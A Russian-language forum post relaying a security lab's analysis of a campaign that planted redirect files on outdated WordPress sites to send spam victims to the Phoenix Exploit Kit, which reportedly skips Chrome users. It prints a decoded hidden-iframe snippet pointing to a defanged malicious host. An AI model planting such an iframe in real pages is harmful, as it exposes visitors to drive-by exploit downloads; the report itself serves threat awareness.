• Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.

Phoenix Exploit Kit распознаёт и не трогает браузеры Google Chrome

Hotab

Активный пользователь
Сообщения
1,163
Симпатии
300
#1
пециалисты по безопасности из M86 Security Labs обнаружили массовое заражение сотен сайтов на движке WordPress 3.2.1. Используя известную уязвимость устаревшей версии WordPress и уже опубликованные эксплоиты для него (1, 2), злоумышленники внедряют жертве в папку Uploads файл HTML с редиректом на страницу с набором эксплоитов Phoenix Exploit Kit.

Уже обнаружено как минимум 400 заражённых сайтов: выборка 1, выборка 2. Самим этим сайтам беспокоиться не о чём, они могут даже не заметить заражения. Злоумышленники используют их просто в качестве красивых URL, чтобы ссылка вызывала доверие у жертв (и чтобы проще обойти спам-фильтры), и рассылают спам, содержащий ссылку на вышеупомянутую страницу.



Вот фрагмент обфусцированного этой страницы.


Этот обфусцированный код ведёт на серверы из инфраструктуры Phoenix Exploit Kit. Проведя расшифровку вышеуказанного кода, можно расшифровать конкретные URL, куда происходит редирект. Например, horoshovsebudet.ru.

Код:
IFRAME style=”RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px” src=”hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php” frameborder=”0″
Другой URL из той же инфраструктуры — hxxxp://monikabestolucci.ru:8801/html/yveveqduclirb1.php.

При этом злоумышленники используют технику Fast Flux для динамического изменения соответствия между IP-адресом и доменным именем, так что данному домену соответствуют десятки IP-адресов.



На сайте Phoenix Exploit Kit происходит распознавание юзер-агента жертвы и на него сваливается ряд экслоитов, характерных для его версии ОС и браузера. Например, при распознавании IE6 пользователь получает эксплоиты для Internet Explorer, Adobe PDF, Flash и Oracle Java.



Судя по следующему скриншоту исходного кода Phoenix Exploit Kit по какой-то причине игнорирует пользователей браузера Google Chrome.